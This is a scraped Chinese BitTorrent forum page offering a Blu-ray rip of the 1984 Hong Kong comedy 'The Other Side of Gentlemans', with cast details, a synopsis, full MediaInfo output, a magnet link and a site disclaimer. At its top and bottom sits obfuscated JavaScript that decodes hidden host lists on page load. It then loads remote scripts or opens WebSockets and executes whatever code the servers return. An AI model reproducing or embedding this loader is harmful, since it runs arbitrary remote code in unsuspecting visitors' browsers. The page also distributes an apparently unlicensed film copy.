君子好逑[国粤语音轨/简繁字幕].The.Other.Side.Of.Gentlemans.1984.BluRay.1080p.2Audio.TrueHD.5.1.x265.10bit 11.09GB

版主小s 1月前 480

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 君子好逑 / Gwan ji ho kau / The Other Side Of Gentlemans

◎年 代 1984

◎产 地 中国香港

◎类 别 喜剧 / 爱情

◎语 言 粤语

◎上映日期 1984-06-28

◎IMDb链接 https://www.imdb.com/title/tt0087522/

◎豆瓣评分 6.9/10 (1268人评价)

◎豆瓣链接 https://movie.douban.com/subject/1304260/

◎片 长 93 分钟

◎导 演 林岭东 Ringo Lam (id:1275076)

◎编 剧 黄炳耀 Barry Wong (id:1014964)

◎演 员 陆剑明 Jamie Luk (id:1290446)

谭咏麟 Alan Tam (id:1050648)

林青霞 Brigitte Lin (id:1044746)

曾楚霖 Choh-Lam Tsang (id:1341398)

黄炳耀 Barry Wong (id:1014964)

冯敬文 Ging Man Fung (id:1341397)

刘嘉蔚 Catherine Lau (id:1341597)

黎应就 Guy Lai (id:1345936)

黄志明 Wong Chi-Ming (id:1398895)

◎标 签 林青霞 / 谭咏麟 / 香港电影 / 香港 / 爱情 / 林岭东 / 喜剧 / 1984

◎简 介

有感于眼下一代年轻人不求上进、没有责任感,有资本家与数位专家决定展开一个实验,看能否用爱情激发年青人的进取之心。牛仔裤店员吴晓辉(谭咏麟 饰)堪称是无追求青年的代表,他整日和一班朋友勾女,毫无上进心,于是成为了实验对象,而担任“爱情机器”给予吴晓辉爱情体验的则是大学助教JoJo(林青霞 饰)。经由一次状况百出、经过安排的“英雄救美”事件,吴晓辉进入了JoJo的爱情剧本,而后者身处大学的职业亦激发了吴晓辉的自卑感,从而埋头苦修日语,期盼能够与JoJo般配。入戏太深的吴晓辉在爱情中无法自拔,当他知晓事情真相后决定义无返顾的追求爱情……

◎获奖情况 (共1项)

第4届香港电影金像奖 (1985)

最佳原创电影歌曲(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 256570225830059170700496025077563652116 (0xC105A0C99DF0FCFDD6D514342A8DF814)

  4. Complete name : The.Other.Side.Of.[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 11.1 GiB

  8. Duration : 1 h 33 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 16.9 Mb/s

  11. Encoded date : UTC 2021-10-15 03:47:16

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 33 min

  21. Bit rate : 9 559 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 036 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.200

  31. Stream size : 6.27 GiB (57%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 9558 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=20 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1036 / interlace=0 / total-frames=135052 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. Format : MLP FBA

  45. Format/Info : Meridian Lossless Packing FBA

  46. Commercial name : Dolby TrueHD

  47. Codec ID : A_TRUEHD

  48. Duration : 1 h 33 min

  49. Bit rate mode : Variable

  50. Bit rate : 2 932 kb/s

  51. Maximum bit rate : 4 404 kb/s

  52. Channel(s) : 6 channels

  53. Channel layout : L R C LFE Ls Rs

  54. Sampling rate : 96.0 kHz

  55. Frame rate : 1 200.000 FPS (80 SPF)

  56. Compression mode : Lossless

  57. Stream size : 1.92 GiB (17%)

  58. Title : Cantonese Dolby TrueHD Audio 5.1 @ 3572 kbps

  59. Language : Chinese

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : AC-3

  65. Format/Info : Audio Coding 3

  66. Commercial name : Dolby Digital

  67. Codec ID : A_AC3

  68. Duration : 1 h 33 min

  69. Bit rate mode : Constant

  70. Bit rate : 640 kb/s

  71. Channel(s) : 6 channels

  72. Channel layout : L R C LFE Ls Rs

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 430 MiB (4%)

  77. Title : Cantonese Dolby Digital Audio 5.1 @ 640 kbps

  78. Language : Chinese

  79. Service kind : Complete Main

  80. Default : No

  81. Forced : No


  82. Audio #3

  83. ID : 4

  84. Format : MLP FBA

  85. Format/Info : Meridian Lossless Packing FBA

  86. Commercial name : Dolby TrueHD

  87. Codec ID : A_TRUEHD

  88. Duration : 1 h 33 min

  89. Bit rate mode : Variable

  90. Bit rate : 2 893 kb/s

  91. Maximum bit rate : 4 386 kb/s

  92. Channel(s) : 6 channels

  93. Channel layout : L R C LFE Ls Rs

  94. Sampling rate : 96.0 kHz

  95. Frame rate : 1 200.000 FPS (80 SPF)

  96. Compression mode : Lossless

  97. Stream size : 1.90 GiB (17%)

  98. Title : Mandarin Dolby TrueHD Audio 5.1 @ 3533 kbps

  99. Language : Chinese

  100. Default : No

  101. Forced : No


  102. Audio #4

  103. ID : 5

  104. Format : AC-3

  105. Format/Info : Audio Coding 3

  106. Commercial name : Dolby Digital

  107. Codec ID : A_AC3

  108. Duration : 1 h 33 min

  109. Bit rate mode : Constant

  110. Bit rate : 640 kb/s

  111. Channel(s) : 6 channels

  112. Channel layout : L R C LFE Ls Rs

  113. Sampling rate : 48.0 kHz

  114. Frame rate : 31.250 FPS (1536 SPF)

  115. Compression mode : Lossy

  116. Stream size : 430 MiB (4%)

  117. Title : Mandarin Dolby Digital Audio 5.1 @ 640 kbps

  118. Language : Chinese

  119. Service kind : Complete Main

  120. Default : No

  121. Forced : No


  122. Text #1

  123. ID : 6

  124. Format : PGS

  125. Codec ID : S_HDMV/PGS

  126. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration : 1 h 32 min

  128. Bit rate : 34.3 kb/s

  129. Count of elements : 2618

  130. Stream size : 22.6 MiB (0%)

  131. Title : Cht/SUP 原盘繁体

  132. Language : Chinese

  133. Default : No

  134. Forced : No


  135. Text #2

  136. ID : 7

  137. Format : PGS

  138. Codec ID : S_HDMV/PGS

  139. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  140. Duration : 1 h 32 min

  141. Bit rate : 31.7 kb/s

  142. Count of elements : 2618

  143. Stream size : 20.9 MiB (0%)

  144. Title : Chs/SUP 原盘简体

  145. Language : Chinese

  146. Default : Yes

  147. Forced : No


  148. Text #3

  149. ID : 8

  150. Format : PGS

  151. Codec ID : S_HDMV/PGS

  152. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  153. Duration : 1 h 32 min

  154. Bit rate : 38.2 kb/s

  155. Count of elements : 2635

  156. Stream size : 25.1 MiB (0%)

  157. Title : Eng/SUP

  158. Language : English

  159. Default : No

  160. Forced : No


  161. Menu

  162. 00:00:00.000 : en:第 01 章

  163. 00:12:20.740 : en:第 02 章

  164. 00:29:12.250 : en:第 03 章

  165. 00:34:48.586 : en:第 04 章

  166. 00:44:48.436 : en:第 05 章

  167. 00:49:12.491 : en:第 06 章

  168. 00:57:07.841 : en:第 07 章

  169. 01:03:56.374 : en:第 08 章

  170. 01:08:41.492 : en:第 09 章

  171. 01:15:43.122 : en:第 10 章

  172. 01:21:13.285 : en:第 11 章

  173. 01:27:10.183 : en:第 12 章




复制代码


TAGS 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:7A0C66F709700A4EBC4F012021E2E759D4C34848

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};